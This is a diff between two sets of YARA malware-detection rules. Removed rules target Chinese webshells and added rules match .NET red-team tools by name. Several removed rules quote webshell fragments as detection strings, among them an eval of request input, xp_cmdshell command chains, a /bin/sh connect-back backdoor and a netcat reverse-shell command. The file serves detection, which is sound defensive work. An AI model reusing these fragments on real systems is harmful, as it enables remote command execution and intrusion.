-		$s1 = "$Config=$_SERVER['QUERY_STRING'];" fullword ascii
-		$s2 = "gzuncompress($_SESSION['api']),null);" ascii
-		$s3 = "sprintf('%s?%s',pack(\"H*\"," ascii
-		$s4 = "if(empty($_SESSION['api']))" fullword ascii
+		$x1 = "ADCollector.exe --SPNs --Term key --Acls 'CN=Domain Admins,CN=Users,DC=lab,DC=local'" wide fullword
+		$s1 = "ADCollector.exe" wide fullword
+		$s2 = "ENCRYPTED_TEXT_PASSWORD_ALLOWED" ascii fullword
+		$s3 = "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf" wide
+		$s4 = "[-] Password Does Not Expire Accounts:" wide
+		$s5 = "  * runAs:       {0}" wide fullword
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Txt_Aspx1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Maliciousclickoncegenerator : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspx1.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L463-L477"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "683af3b4-4c91-5ff3-96bf-d5c1d9c19cc2"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L77-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
-		logic_hash = "20bdadd6c8b61ab14f6280f55a90f541bf65c33675f979ebe489cc3967438e15"
+		logic_hash = "91e5878d49ad9af5420d4e29afaa600337fb8051951598a997cd74d72c884206"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item["
-		$s1 = "],\"unsafe\");%>" fullword ascii
+		$name = "MaliciousClickOnceGenerator" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 150 and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Shell : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Directinjectorpoc : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file shell.c"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3e4c5928-346e-541b-b1a8-b37d5e3abc98"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L479-L496"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d9a430d7-b062-554b-aff4-cfd98d91e9fe"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/badBounty/directInjectorPOC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L92-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8342b634636ef8b3235db0600a63cc0ce1c06b62"
-		logic_hash = "020e9e6ef776a9d69939fa3dec771dc516b0184086738bab439063acca89bd76"
+		logic_hash = "ffdc5694668af6c82b493403373d2e2e915e45bca8d58ec1ab41c5a8bd28d781"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "printf(\"Could not connect to remote shell!\\n\");" fullword ascii
-		$s2 = "printf(\"Usage: %s <reflect ip> <port>\\n\", prog);" fullword ascii
-		$s3 = "execl(shell,\"/bin/sh\",(char *)0);" fullword ascii
-		$s4 = "char shell[]=\"/bin/sh\";" fullword ascii
-		$s5 = "connect back door\\n\\n\");" fullword ascii
+		$name = "directInjectorPOC" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 2KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Asp : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Asstrongasfuck : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file asp.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "39a2ba9a-c429-574f-8820-5e0270a4b84c"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L498-L512"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "4c63c8a2-5889-5177-9f66-8e5f755025a3"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Charterino/AsStrongAsFuck"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L107-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a63549f749f4d9d0861825764e042e299e06a705"
-		logic_hash = "9eab239310fbebe8c88cbf8d0ee4123b8f3e2ebe601949e1e984e9cfde9869e7"
+		logic_hash = "4765f2099bf8fa8ebccd8cdcc561354f4aeba28c2473fd8556f1ef1d5d28dadd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:BodyCol" ascii
-		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+		$name = "AsStrongAsFuck" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Asp1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Magentoscanner : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file asp1.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b00ab02c-c767-568c-be99-6cc731c3f1dc"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L514-L530"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "db3912bd-574c-57e2-a9b6-4b440d144471"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/soufianetahiri/MagentoScanner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L122-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "95934d05f0884e09911ea9905c74690ace1ef653"
-		logic_hash = "77a4409b852d24228b0e1701f1ccc2abe3930c2c7240a43796b23042e706d9bf"
+		logic_hash = "245dce3be07c8e84dfcd2cdb2d9f24406a9b11b437e74969f1472a6ee149fd9c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
-		$s2 = "autoLoginEnable=WSHShell.RegRead(autoLoginPath & autoLoginEnableKey)" fullword ascii
-		$s3 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
-		$s4 = "szTempFile = server.mappath(\"cmd.txt\")" fullword ascii
+		$name = "MagentoScanner" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 70KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Php_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Revengerat_Stub_Cssharp : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file php.html"
-		author = "Florian Roth (Nextron Systems)"
-		id = "66916e32-9471-54bd-944e-bb751b38d3b0"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L532-L552"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "06dce4f9-4d7a-5976-a87a-07c539e5dbe8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/NYAN-x-CAT/RevengeRAT-Stub-CSsharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L137-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a7d5fcbd39071e0915c4ad914d31e00c7127bcfc"
-		logic_hash = "c08f62c3d468c2ebacd10fff6aa0c63bd303d627d487c070a9d22419bf6906cd"
+		logic_hash = "a3bd1f8e52e6ed468b6a4fea83456ca813b69e2d676dfab687bbea5a746fed3c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "function connect($dbhost, $dbuser, $dbpass, $dbname='') {" fullword ascii
-		$s2 = "scookie('loginpass', '', -86400 * 365);" fullword ascii
-		$s3 = "<title><?php echo $act.' - '.$_SERVER['HTTP_HOST'];?></title>" fullword ascii
-		$s4 = "Powered by <a title=\"Build 20130112\" href=\"http://www.4ngel.net\" target=\"_b" ascii
-		$s5 = "formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\\'shell\\',null,this." ascii
-		$s6 = "secparam('IP Configurate',execute('ipconfig -all'));" fullword ascii
-		$s7 = "secparam('Hosts', @file_get_contents('/etc/hosts'));" fullword ascii
-		$s8 = "p('<p><a href=\"http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/\" target=" ascii
+		$name = "RevengeRAT-Stub-CSsharp" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 100KB and 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Ftp : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpyshell : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file ftp.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "311de4b0-fa19-545a-8a65-a40b255b5b39"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L554-L573"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "3069c5eb-446e-5bfa-9df0-2e03f229d4d1"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/antonioCoco/SharPyShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L152-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3495e6bcb5484e678ce4bae0bd1a420b7eb6ad1d"
-		logic_hash = "02eae9b19274ab7b816d7c336017af8f0fdd5273664eb37be92be12661f3ef1f"
+		logic_hash = "89d0010c08349f8982c7f5aa5f7855702556ce10f9f3b5b18b61349c5233e001"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "';exec master.dbo.xp_cmdshell 'echo open " ascii
-		$s2 = "';exec master.dbo.xp_cmdshell 'ftp -s:';" ascii
-		$s3 = "';exec master.dbo.xp_cmdshell 'echo get lcx.exe" ascii
-		$s4 = "';exec master.dbo.xp_cmdshell 'echo get php.exe" ascii
-		$s5 = "';exec master.dbo.xp_cmdshell 'copy " ascii
-		$s6 = "ftp -s:d:\\ftp.txt " fullword ascii
-		$s7 = "echo bye>>d:\\ftp.txt " fullword ascii
+		$name = "SharPyShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 2KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Lcx : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostloader : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file lcx.c"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4a4e8810-6dae-526e-86f0-43de45d1c87a"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L575-L592"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d8d88f3f-f250-55ff-88a6-4623e12ef89d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/TheWover/GhostLoader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L167-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ddb3b6a5c5c22692de539ccb796ede214862befe"
-		logic_hash = "48121824d3173b77b54b52dc60d3422a904ada46a6ebb20bb585086911cd8360"
+		logic_hash = "91527b4b35f2bb1aeee236647c5169c67f2b9cfb867f2b6d486bd8d8b7455d4b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "printf(\"Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-l" ascii
-		$s2 = "sprintf(tmpbuf2,\"\\r\\n########### reply from %s:%d ####################\\r\\n" ascii
-		$s3 = "printf(\" 3: connect to HOST1:PORT1 and HOST2:PORT2\\r\\n\");" fullword ascii
-		$s4 = "printf(\"got,ip:%s,port:%d\\r\\n\",inet_ntoa(client1.sin_addr),ntohs(client1.sin" ascii
-		$s5 = "printf(\"[-] connect to host1 failed\\r\\n\");" fullword ascii
+		$name = "GhostLoader" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 25KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Jspcmd : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetinject : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file jspcmd.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L594-L608"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "468f89c4-5b94-53be-b9e6-ad21de7d98ba"
+		date = "2021-01-22"
+		modified = "2022-06-28"
+		reference = "https://github.com/dtrizna/DotNetInject"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L182-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1d4e789031b15adde89a4628afc759859e53e353"
-		logic_hash = "d2cbf753fbd9e261234e6beb6f79aecb407a368704ae09d907d128d04c242053"
+		logic_hash = "07ba4ba23372dbc2618dcea89ef643cd68371ace1116bfeb939b0f9adfc425bb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
-		$s4 = "out.print(\"Hi,Man 2015\");" fullword ascii
+		$name = "DotNetInject" ascii wide
+		$compile = "AssemblyTitle" ascii wide
+		$fp1 = "GetDotNetInjector" ascii
+		$fp2 = "JetBrains.TeamCity.Injector." wide
 
 	condition:
-		filesize < 1KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 20MB and $name and $compile and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Txt_Jsp : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Atpminidump : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file jsp.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L610-L626"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "97981569-fe94-5600-8319-946edb4265e7"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/b4rtik/ATPMiniDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L204-L217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "74518faf08637c53095697071db09d34dbe8d676"
-		logic_hash = "039b145031cf1127cb1b2aeda063d578d9eb151559232d7e6049965111df1e28"
+		logic_hash = "7498ed5d11b9c3646ebd2d1330a239c43e9c5b270b1778871c2821a2fefb5137"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
-		$s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii
-		$s3 = "<option value=\\\"nc -e cmd.exe 192.168.230.1 4444\\\">nc</option>\"" fullword ascii
-		$s4 = "cmd = \"cmd.exe /c set\";" fullword ascii
+		$name = "ATPMiniDump" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 715KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Aspxlcx : FILE
+rule SIGNATURE_BASE_SUSP_NET_NAME_Confuserex : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspxlcx.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L628-L644"
+		description = "Detects ConfuserEx packed file"
+		author = "Arnim Rupp"
+		id = "f1bda14e-c9fe-5341-8962-691a66233eb0"
+		date = "2021-01-22"
+		modified = "2021-01-25"
+		reference = "https://github.com/yck1509/ConfuserEx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L219-L234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "453dd3160db17d0d762e032818a5a10baf234e03"
-		logic_hash = "a6e41e6882e74b0dd55ec4afbf6f8708e28267657e304c97d1304266fe1fbc93"
-		score = 75
+		logic_hash = "beecb7b66830a033e2048da246d320c1ffc5015b280b34fb61aee87c8a42fff3"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "public string remoteip = " ascii
-		$s2 = "=Dns.Resolve(host);" ascii
-		$s3 = "public string remoteport = " ascii
-		$s4 = "public class PortForward" ascii
+		$name = "ConfuserEx" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 18KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Xiao : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpbuster : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file xiao.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cd375597-c343-5f7d-8574-23f700ff432b"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L646-L663"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d30c8ee5-88b9-53b5-b209-51f6f3b988cf"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/passthehashbrowns/SharpBuster"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L236-L249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b3b98fb57f5f5ccdc42e746e32950834807903b7"
-		logic_hash = "e99c307482148e4d0eb660281fa70f2dcece200ac8aed032bbef41e421d2a155"
+		logic_hash = "cdc19e03f75f34e6349937c0bff313298fc9310f361eec7af022c450d083ad96"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
-		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
-		$s3 = "conn.Execute(\"Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED," ascii
-		$s4 = "function Command(cmd, str){" fullword ascii
-		$s5 = "echo \"if(obj.value=='PageWebProxy')obj.form.target='_blank';\"" fullword ascii
+		$name = "SharpBuster" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Aspx : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Amsibypass : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspx.jpg"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L665-L681"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "26db14d8-1034-5bd1-a719-4756c832901d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/0xB455/AmsiBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L251-L269"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ce24e277746c317d887139a0d71dd250bfb0ed58"
-		logic_hash = "43c386bfa88db77801b0494d6a5e4406688f957ffedeb4d2ecdd244549dec708"
+		hash = "8fa4ba512b34a898c4564a8eac254b6a786d195b"
+		logic_hash = "f93b1014c7e26462fbbd3cd572cfa21a09c5da915a9a51d3e58a46a2b9b7cfe4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
-		$s2 = "Process[] p=Process.GetProcesses();" fullword ascii
-		$s3 = "Copyright &copy; 2009 Bin" ascii
-		$s4 = "<td colspan=\"5\">CmdShell&nbsp;&nbsp;:&nbsp;<input class=\"input\" runat=\"serv" ascii
+		$s_name = "AmsiBypass" ascii wide
+		$s_compile = "AssemblyTitle" ascii wide
+		$fp1 = "Adaptive Threat Protection" wide
 
 	condition:
-		filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Txt_Sql : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Recon_AD : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file Sql.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "586f23d4-3a04-520d-b75b-f9bbcf67ceeb"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L683-L699"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "097de5cd-0cd4-59cc-a7b7-54cad8e6d230"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/outflanknl/Recon-AD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L271-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f7813f1dfa4eec9a90886c80b88aa38e2adc25d5"
-		logic_hash = "0712b6736d8bdc1f19b3494dc3aab9e9a04dde167b5f843e319755cd311e29bd"
+		logic_hash = "7bfafb2d3e85bb584bd02cb92457d22b07626f71d071c44a4aefbb5748045446"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd=chr(34)&\"cmd.exe /c \"&request.form(\"cmd\")&\" > 8617.tmp\"&chr(34)" fullword ascii
-		$s2 = "strQuery=\"dbcc addextendedproc ('xp_regwrite','xpstar.dll')\"" fullword ascii
-		$s3 = "strQuery = \"exec master.dbo.xp_cmdshell '\" & request.form(\"cmd\") & \"'\" " fullword ascii
-		$s4 = "session(\"login\")=\"\"" fullword ascii
+		$name = "Recon-AD" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 15KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Hello : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpwatchdogs : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file hello.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "42d01411-e333-543d-84a2-758c13bad2df"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L701-L717"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "5343be58-879a-5fe7-9036-ee6a22d85f22"
+		date = "2021-01-22"
+		modified = "2024-12-10"
